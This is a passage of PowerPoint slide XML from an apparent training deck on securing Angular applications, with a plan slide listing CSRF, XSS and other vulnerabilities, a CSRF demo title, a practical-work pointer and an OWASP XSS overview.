                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSRF – Which Protection for Angular ?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="18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843559"/>
            <a:ext cx="7632848"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707654"/>
            <a:ext cx="3409950"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196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2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="151200" y="283500"/>
            <a:ext cx="6293008" cy="560058"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Secure your Angular Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" smtClean="0"/>
              <a:t>						</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Plan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-180528" y="915566"/>
            <a:ext cx="9289032" cy="3672408"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Reminders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>JavaScript Frameworks &amp; SPA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>OWASP &amp; vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" altLang="fr-FR" sz="1100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="270000" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" altLang="fr-FR" sz="1100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" dirty="0"/>
              <a:t>Vulnerabilities &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Angular Protections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="540000" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" altLang="fr-FR" sz="600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="540000" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>let </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" i="1" dirty="0" smtClean="0"/>
              <a:t> = [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>OAuth, CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" i="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" i="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Template injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" i="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>3rd party</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Underprotected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> APIs, JSON </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>hijacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" i="1" dirty="0" smtClean="0"/>
              <a:t>];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="540000" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" b="1" i="1" dirty="0"/>
              <a:t>(let </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" b="1" i="1" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" b="1" i="1" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" i="1" dirty="0" smtClean="0"/>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" altLang="fr-FR" sz="1100" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1080000" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" i="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>console.log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" i="1" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>details</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" i="1" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1080000" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>let</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mitigation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" i="1" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" i="1" dirty="0" err="1" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>ngMitigate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" i="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" i="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" i="1" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1080000" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" b="1" i="1" dirty="0"/>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" i="1" dirty="0"/>
              <a:t>(demo) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" b="1" i="1" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" i="1" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mitigation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" i="1" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1080000" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" i="1" dirty="0" smtClean="0"/>
              <a:t>(demand &amp;&amp; time) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" i="1" dirty="0" err="1">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>implement_pw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" i="1" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnerability, mitigation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" i="1" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" altLang="fr-FR" sz="1100" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="540000" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1100" i="1" dirty="0" smtClean="0"/>
              <a:t>});</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="540000" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" altLang="fr-FR" sz="800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" lvl="2" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" dirty="0"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>ecommendations</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" altLang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="173856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1851670"/>
            <a:ext cx="6696744" cy="1102519"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CSRF protection </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Demo (AngularJS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36294555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SRF_demo - juin 08 2017 11.30.04.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5536" y="195486"/>
            <a:ext cx="8229600" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="390714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915566"/>
            <a:ext cx="8856984" cy="3024336"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PW - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSRF</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Exercises</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
              <a:t>	Follow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>practical_works</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="1" dirty="0" smtClean="0"/>
              <a:t>/PW-XSRF.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
              <a:t> instructions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28641776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1851670"/>
            <a:ext cx="6696744" cy="1102519"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-Site Scripting </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38052964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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="151200" y="283500"/>
            <a:ext cx="6653048"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800" dirty="0" smtClean="0"/>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</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07504" y="771550"/>
            <a:ext cx="9001000" cy="3672408"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1200" b="1" dirty="0" err="1"/>
              <a:t>Overview</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1200" b="1" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1200" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR" sz="800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="269875" lvl="1" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Cross-Site Scripting (XSS) is a web application vulnerability that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>occurs when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>untrusted data from the user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>is processed by the web application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>without validation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> and is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>reflected back to the browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>without encoding or escaping, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>resulting in code execution at the browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>engine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="269875" lvl="1" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="269875" lvl="1" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100" dirty="0" smtClean="0"/>
              <a:t>A3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100" dirty="0"/>
              <a:t>- OWASP Top 10 vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="269875" lvl="1" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
